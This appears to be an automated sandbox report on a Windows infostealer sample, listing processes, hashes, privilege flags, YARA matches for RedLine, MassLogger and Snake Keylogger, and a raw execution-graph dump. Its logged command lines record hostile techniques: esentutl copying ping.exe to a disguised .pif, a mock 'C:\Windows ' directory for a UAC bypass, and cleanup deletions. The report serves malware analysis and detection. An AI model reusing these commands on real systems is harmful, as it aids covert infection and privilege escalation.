Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 9
Start time: 01:05:32
Start date: 10/12/2024
Path: C:\Users\Public\Libraries\ymafvvdS.pif
Wow64 process (32bit): true
Commandline: C:\Users\Public\Libraries\ymafvvdS.pif
Imagebase: 0x400000
File size: 68'096 bytes
MD5 hash: C116D3604CEAFE7057D77FF27552C215
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000001.1572297626.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000009.00000003.1577655247.0000000024742000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
Reputation: moderate
Has exited: false

Target ID: 10
Start time: 01:05:34
Start date: 10/12/2024
Path: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Imagebase: 0x400000
File size: 1'290'240 bytes
MD5 hash: BD3B960B1EFB321AF06FE54D1D30C855
Has elevated privileges: true
Has administrator privileges: true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                        • Detection: 100%, Avira
                                                                                                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:11
                                                                                                                                                                                                                        Start time:01:05:35
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                                                                                        Imagebase:0x370000
                                                                                                                                                                                                                        File size:352'768 bytes
                                                                                                                                                                                                                        MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:12
                                                                                                                                                                                                                        Start time:01:05:36
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'225'728 bytes
                                                                                                                                                                                                                        MD5 hash:1F7F4AE415948A1027E513F2D23B8A5B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:13
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:14
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppVStrm.sys
                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                        File size:138'056 bytes
                                                                                                                                                                                                                        MD5 hash:BDA55F89B69757320BC125FF1CB53B26
                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Reputation:moderate
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:15
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVemgr.sys
                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                        File size:174'408 bytes
                                                                                                                                                                                                                        MD5 hash:E70EE9B57F8D771E2F4D6E6B535F6757
                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:16
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\drivers\AppvVfs.sys
                                                                                                                                                                                                                        Wow64 process (32bit):
                                                                                                                                                                                                                        Commandline:
                                                                                                                                                                                                                        Imagebase:
                                                                                                                                                                                                                        File size:154'952 bytes
                                                                                                                                                                                                                        MD5 hash:2CBABD729D5E746B6BD8DC1B4B4DB1E1
                                                                                                                                                                                                                        Has elevated privileges:
                                                                                                                                                                                                                        Has administrator privileges:
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:17
                                                                                                                                                                                                                        Start time:01:05:38
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\AppVClient.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\AppVClient.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'348'608 bytes
                                                                                                                                                                                                                        MD5 hash:500275C60FCB5B035FD81A2BA2CB2073
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:18
                                                                                                                                                                                                                        Start time:01:05:39
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:22
Start time: 01:05:41
Start date: 10/12/2024
Path: C:\Users\Public\alpha.pif
Wow64 process (32bit): true
Commandline: C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Imagebase: 0x190000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 01:05:41
Start date: 10/12/2024
Path: C:\Users\Public\xpha.pif
Wow64 process (32bit): true
Commandline: C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Imagebase: 0x770000
File size: 18'944 bytes
MD5 hash: B3624DD758CCECF93A1226CEF252CA12
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 24
Start time: 01:05:41
Start date: 10/12/2024
Path: C:\Windows\System32\FXSSVC.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\fxssvc.exe
Imagebase: 0x140000000
File size: 1'242'624 bytes
MD5 hash: 3117CDDE7FDB0851FDBCA3E7FDB7A142
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 25
Start time: 01:05:43
Start date: 10/12/2024
Path: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Imagebase: 0x140000000
File size: 2'354'176 bytes
MD5 hash: 6A2E9C13C2A578F9FC128F26D48FC3D7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 26
Start time: 01:05:44
Start date: 10/12/2024
Path: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Imagebase: 0x140000000
File size: 1'356'800 bytes
MD5 hash: 5AF7A965937863A10C99D5EC19A974A5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 01:05:45
Start date: 10/12/2024
Path: C:\Windows\System32\msdtc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\msdtc.exe
Imagebase: 0x140000000
File size: 1'278'464 bytes
MD5 hash: 7AE7553BA674284A076D19A633F7EFF0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 28
Start time: 01:05:46
Start date: 10/12/2024
Path: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Imagebase: 0x140000000
File size: 1'235'968 bytes
MD5 hash: 93CC0F7EAE7D58C22855106B435E4B64
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 29
Start time: 01:05:47
Start date: 10/12/2024
Path: C:\Windows\SysWOW64\perfhost.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWow64\perfhost.exe
Imagebase: 0x400000
File size: 1'150'976 bytes
MD5 hash: B5FDD433E07825BDB9C6B8F563B00FDE
Has elevated privileges: true
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 30
Start time: 01:05:48
Start date: 10/12/2024
Path: C:\Windows\System32\Locator.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\locator.exe
Imagebase: 0x140000000
File size: 1'141'248 bytes
MD5 hash: 979F07784823EB9149D134FBAB0B4376
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 31
Start time: 01:05:50
Start date: 10/12/2024
Path: C:\Windows\System32\SensorDataService.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\SensorDataService.exe
Imagebase: 0x140000000
File size: 1'846'784 bytes
MD5 hash: 3F2AB6CB57E7A0604E4E19795A526BD3
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 32
Start time: 01:05:50
Start date: 10/12/2024
Path: C:\Windows\System32\snmptrap.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\snmptrap.exe
Imagebase: 0x140000000
File size: 1'146'880 bytes
MD5 hash: 9E84CEFC497519C8483A6623FAD6ED3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                        Start time:01:05:52
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                        Start time:01:05:52
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                        Start time:01:05:52
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\Spectrum.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\spectrum.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'455'616 bytes
                                                                                                                                                                                                                        MD5 hash:07D3656AD4DF3DADDEDA88F101DE735C
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:37
                                                                                                                                                                                                                        Start time:01:05:53
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                        Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                                                                                                                                                                        Imagebase:0x190000
                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:38
                                                                                                                                                                                                                        Start time:01:05:54
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\System32\OpenSSH\ssh-agent.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'511'424 bytes
                                                                                                                                                                                                                        MD5 hash:A5F4C6CB650242AC4B9D281D7FB3AD95
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:39
                                                                                                                                                                                                                        Start time:01:05:55
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\TieringEngineService.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\TieringEngineService.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'455'616 bytes
                                                                                                                                                                                                                        MD5 hash:ADFE5C8879C41AEA47D22E19AC1F0F44
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                        Target ID:40
                                                                                                                                                                                                                        Start time:01:05:56
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\AgentService.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\system32\AgentService.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'801'216 bytes
                                                                                                                                                                                                                        MD5 hash:11EB7B63D45B07D2E9811E4D818A0174
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                        Target ID:41
                                                                                                                                                                                                                        Start time:01:05:56
                                                                                                                                                                                                                        Start date:10/12/2024
                                                                                                                                                                                                                        Path:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                        Commandline:C:\Windows\System32\vds.exe
                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                        File size:1'303'552 bytes
                                                                                                                                                                                                                        MD5 hash:680F459932662444F71FD678EBDF4171
                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                        Has exited:false


Execution Graph

Execution Coverage:16.2%
Dynamic/Decrypted Code Coverage:100%
Signature Coverage:30.2%
Total number of Nodes:1642
Total number of Limit Nodes:19
calls 36533->36534 36535 2b374c8 36534->36535 36536 2b289d0 20 API calls 36535->36536 36537 2b374ec 36536->36537 36538 2b14860 11 API calls 36537->36538 36539 2b3750d 36538->36539 36540 2b147ec 11 API calls 36539->36540 36541 2b37544 36540->36541 36542 2b289d0 20 API calls 36541->36542 36543 2b37568 36542->36543 36544 2b14860 11 API calls 36543->36544 36545 2b37589 36544->36545 36546 2b147ec 11 API calls 36545->36546 36547 2b375c0 36546->36547 36548 2b289d0 20 API calls 36547->36548 36549 2b375e4 36548->36549 36550 2b14860 11 API calls 36549->36550 36551 2b37605 36550->36551 36552 2b147ec 11 API calls 36551->36552 36553 2b3763c 36552->36553 36554 2b289d0 20 API calls 36553->36554 36555 2b37660 36554->36555 36556 2b14860 11 API calls 36555->36556 36557 2b37681 36556->36557 36558 2b147ec 11 API calls 36557->36558 36559 2b376b8 36558->36559 36560 2b289d0 20 API calls 36559->36560 36561 2b376dc 36560->36561 36562 2b14860 11 API calls 36561->36562 36563 2b376fd 36562->36563 36564 2b147ec 11 API calls 36563->36564 36565 2b37734 36564->36565 36566 2b289d0 20 API calls 36565->36566 36567 2b37758 36566->36567 36568 2b14860 11 API calls 36567->36568 36569 2b37779 36568->36569 36570 2b147ec 11 API calls 36569->36570 36571 2b377b0 36570->36571 36572 2b289d0 20 API calls 36571->36572 36573 2b377d4 36572->36573 36574 2b377e9 36573->36574 36575 2b38318 36573->36575 36576 2b14860 11 API calls 36574->36576 36577 2b14860 11 API calls 36575->36577 36578 2b3780a 36576->36578 36579 2b38339 36577->36579 36580 2b147ec 11 API calls 36578->36580 36581 2b147ec 11 API calls 36579->36581 36582 2b37841 36580->36582 36583 2b38370 36581->36583 36584 2b289d0 20 API calls 36582->36584 36585 2b289d0 20 API calls 36583->36585 36586 2b37865 36584->36586 36587 2b38394 36585->36587 36588 2b14860 11 API calls 36586->36588 36589 2b14860 11 API calls 36587->36589 36590 2b37886 36588->36590 36591 2b383b5 36589->36591 36592 2b147ec 11 API calls 36590->36592 36593 2b147ec 11 API calls 36591->36593 36594 
2b378bd 36592->36594 36595 2b383ec 36593->36595 36596 2b289d0 20 API calls 36594->36596 36597 2b289d0 20 API calls 36595->36597 36598 2b378e1 36596->36598 36599 2b38410 36597->36599 36600 2b14860 11 API calls 36598->36600 36601 2b14860 11 API calls 36599->36601 36602 2b37902 36600->36602 36603 2b38431 36601->36603 36604 2b147ec 11 API calls 36602->36604 36605 2b147ec 11 API calls 36603->36605 36606 2b37939 36604->36606 36607 2b38468 36605->36607 36608 2b289d0 20 API calls 36606->36608 36609 2b289d0 20 API calls 36607->36609 36610 2b3795d 36608->36610 36611 2b3848c 36609->36611 36612 2b147ec 11 API calls 36610->36612 36613 2b14860 11 API calls 36611->36613 36614 2b37975 36612->36614 36616 2b384ad 36613->36616 37789 2b285bc 36614->37789 36619 2b147ec 11 API calls 36616->36619 36618 2b14860 11 API calls 36620 2b379a7 36618->36620 36621 2b384e4 36619->36621 36622 2b147ec 11 API calls 36620->36622 36623 2b289d0 20 API calls 36621->36623 36625 2b379de 36622->36625 36624 2b38508 36623->36624 36626 2b393a1 36624->36626 36627 2b3851d 36624->36627 36630 2b289d0 20 API calls 36625->36630 36628 2b14860 11 API calls 36626->36628 36629 2b14860 11 API calls 36627->36629 36634 2b393c2 36628->36634 36631 2b3853e 36629->36631 36632 2b37a02 36630->36632 36635 2b38556 36631->36635 36633 2b14860 11 API calls 36632->36633 36638 2b37a23 36633->36638 36637 2b147ec 11 API calls 36634->36637 36636 2b147ec 11 API calls 36635->36636 36639 2b38575 36636->36639 36641 2b393f9 36637->36641 36640 2b147ec 11 API calls 36638->36640 36642 2b3858d 36639->36642 36646 2b37a5a 36640->36646 36643 2b289d0 20 API calls 36641->36643 36644 2b289d0 20 API calls 36642->36644 36645 2b3941d 36643->36645 36647 2b38599 36644->36647 36648 2b14860 11 API calls 36645->36648 36650 2b289d0 20 API calls 36646->36650 36649 2b14860 11 API calls 36647->36649 36654 2b3943e 36648->36654 36651 2b385ba 36649->36651 36652 2b37a7e 36650->36652 36655 2b385c5 36651->36655 36653 2b14860 11 API calls 36652->36653 36658 2b37a9f 
36653->36658 36656 2b147ec 11 API calls 36654->36656 36657 2b147ec 11 API calls 36655->36657 36661 2b39475 36656->36661 36659 2b385f1 36657->36659 36660 2b147ec 11 API calls 36658->36660 36662 2b385fc 36659->36662 36666 2b37ad6 36660->36666 36663 2b289d0 20 API calls 36661->36663 36664 2b289d0 20 API calls 36662->36664 36665 2b39499 36663->36665 36667 2b38615 36664->36667 36668 2b14860 11 API calls 36665->36668 36670 2b289d0 20 API calls 36666->36670 36669 2b14860 11 API calls 36667->36669 36671 2b394ba 36668->36671 36672 2b38636 36669->36672 36673 2b37afa 36670->36673 36674 2b147ec 11 API calls 36671->36674 36675 2b147ec 11 API calls 36672->36675 37801 2b2adf8 29 API calls 36673->37801 36680 2b394f1 36674->36680 36679 2b3866d 36675->36679 36677 2b37b21 36678 2b14860 11 API calls 36677->36678 36683 2b37b42 36678->36683 36681 2b289d0 20 API calls 36679->36681 36682 2b289d0 20 API calls 36680->36682 36684 2b38691 36681->36684 36691 2b39515 36682->36691 36686 2b147ec 11 API calls 36683->36686 36685 2b147ec 11 API calls 36684->36685 36687 2b386bd 36685->36687 36692 2b37b79 36686->36692 36690 2b386d5 36687->36690 36688 2b39cf5 36689 2b14860 11 API calls 36688->36689 36694 2b39d16 36689->36694 36696 2b386e0 CreateProcessAsUserW 36690->36696 36691->36688 36693 2b14860 11 API calls 36691->36693 36695 2b289d0 20 API calls 36692->36695 36704 2b39560 36693->36704 36700 2b147ec 11 API calls 36694->36700 36697 2b37b9d 36695->36697 36698 2b386f2 36696->36698 36699 2b3876e 36696->36699 36702 2b14860 11 API calls 36697->36702 36703 2b14860 11 API calls 36698->36703 36701 2b14860 11 API calls 36699->36701 36708 2b39d4d 36700->36708 36709 2b3878f 36701->36709 36710 2b37bbe 36702->36710 36705 2b38713 36703->36705 36707 2b147ec 11 API calls 36704->36707 36706 2b3871e 36705->36706 36714 2b147ec 11 API calls 36706->36714 36715 2b39597 36707->36715 36711 2b289d0 20 API calls 36708->36711 36712 2b147ec 11 API calls 36709->36712 36713 2b147ec 11 API calls 36710->36713 36716 2b39d71 
36711->36716 36722 2b387c6 36712->36722 36723 2b37bf5 36713->36723 36717 2b3874a 36714->36717 36719 2b289d0 20 API calls 36715->36719 36718 2b14860 11 API calls 36716->36718 36720 2b38755 36717->36720 36725 2b39d92 36718->36725 36721 2b395bb 36719->36721 36728 2b289d0 20 API calls 36720->36728 36724 2b14860 11 API calls 36721->36724 36726 2b289d0 20 API calls 36722->36726 36727 2b289d0 20 API calls 36723->36727 36734 2b395dc 36724->36734 36731 2b147ec 11 API calls 36725->36731 36729 2b387ea 36726->36729 36730 2b37c19 36727->36730 36728->36699 36732 2b14860 11 API calls 36729->36732 36733 2b14860 11 API calls 36730->36733 36737 2b39dc9 36731->36737 36738 2b3880b 36732->36738 36736 2b37c3a 36733->36736 36735 2b147ec 11 API calls 36734->36735 36743 2b39613 36735->36743 36741 2b147ec 11 API calls 36736->36741 36739 2b289d0 20 API calls 36737->36739 36740 2b147ec 11 API calls 36738->36740 36742 2b39ded 36739->36742 36747 2b38842 36740->36747 36748 2b37c71 36741->36748 36744 2b14860 11 API calls 36742->36744 36745 2b289d0 20 API calls 36743->36745 36750 2b39e0e 36744->36750 36746 2b39637 36745->36746 36749 2b14860 11 API calls 36746->36749 36751 2b289d0 20 API calls 36747->36751 36752 2b289d0 20 API calls 36748->36752 36756 2b39658 36749->36756 36755 2b147ec 11 API calls 36750->36755 36753 2b38866 36751->36753 36754 2b37c95 36752->36754 36757 2b149f8 11 API calls 36753->36757 36759 2b14860 11 API calls 36754->36759 36762 2b39e45 36755->36762 36760 2b147ec 11 API calls 36756->36760 36758 2b3888a 36757->36758 36763 2b14860 11 API calls 36758->36763 36764 2b37cd5 36759->36764 36761 2b3968f 36760->36761 36769 2b289d0 20 API calls 36761->36769 36765 2b289d0 20 API calls 36762->36765 36766 2b388b9 36763->36766 36768 2b147ec 11 API calls 36764->36768 36771 2b39e69 36765->36771 36767 2b388c4 36766->36767 36773 2b147ec 11 API calls 36767->36773 36777 2b37d0c 36768->36777 36770 2b396b3 36769->36770 37339 2b2f094 36770->37339 36775 2b289d0 20 API calls 36771->36775 36776 2b388f0 
36773->36776 36781 2b39e9c 36775->36781 36782 2b388fb 36776->36782 36779 2b289d0 20 API calls 36777->36779 36778 2b14860 11 API calls 36784 2b396f7 36778->36784 36780 2b37d30 36779->36780 36783 2b14860 11 API calls 36780->36783 36786 2b289d0 20 API calls 36781->36786 36785 2b289d0 20 API calls 36782->36785 36790 2b37d51 36783->36790 36788 2b14860 11 API calls 36784->36788 36787 2b38914 36785->36787 36792 2b39ecf 36786->36792 36789 2b14860 11 API calls 36787->36789 36794 2b3972f 36788->36794 36793 2b38935 36789->36793 36791 2b147ec 11 API calls 36790->36791 36798 2b37d88 36791->36798 36795 2b289d0 20 API calls 36792->36795 36796 2b147ec 11 API calls 36793->36796 36797 2b147ec 11 API calls 36794->36797 36799 2b39f02 36795->36799 36802 2b3896c 36796->36802 36801 2b39766 36797->36801 36800 2b289d0 20 API calls 36798->36800 36804 2b289d0 20 API calls 36799->36804 36803 2b37dac 36800->36803 36806 2b289d0 20 API calls 36801->36806 36808 2b289d0 20 API calls 36802->36808 36805 2b14860 11 API calls 36803->36805 36807 2b39f35 36804->36807 36814 2b37dcd 36805->36814 36809 2b3978a 36806->36809 36810 2b14860 11 API calls 36807->36810 36811 2b38990 36808->36811 36812 2b14860 11 API calls 36809->36812 36815 2b39f56 36810->36815 36813 2b14860 11 API calls 36811->36813 36817 2b397ab 36812->36817 36818 2b389b1 36813->36818 36816 2b147ec 11 API calls 36814->36816 36819 2b147ec 11 API calls 36815->36819 36822 2b37e04 36816->36822 36821 2b147ec 11 API calls 36817->36821 36820 2b147ec 11 API calls 36818->36820 36823 2b39f8d 36819->36823 36826 2b389e8 36820->36826 36825 2b397e2 36821->36825 36824 2b289d0 20 API calls 36822->36824 36828 2b289d0 20 API calls 36823->36828 36827 2b37e28 36824->36827 36830 2b289d0 20 API calls 36825->36830 36832 2b289d0 20 API calls 36826->36832 37802 2b25aec 42 API calls 36827->37802 36831 2b39fb1 36828->36831 36834 2b39806 36830->36834 36835 2b14860 11 API calls 36831->36835 36836 2b38a0c 36832->36836 37346 2b17e5c 36834->37346 36847 2b39fd2 36835->36847 
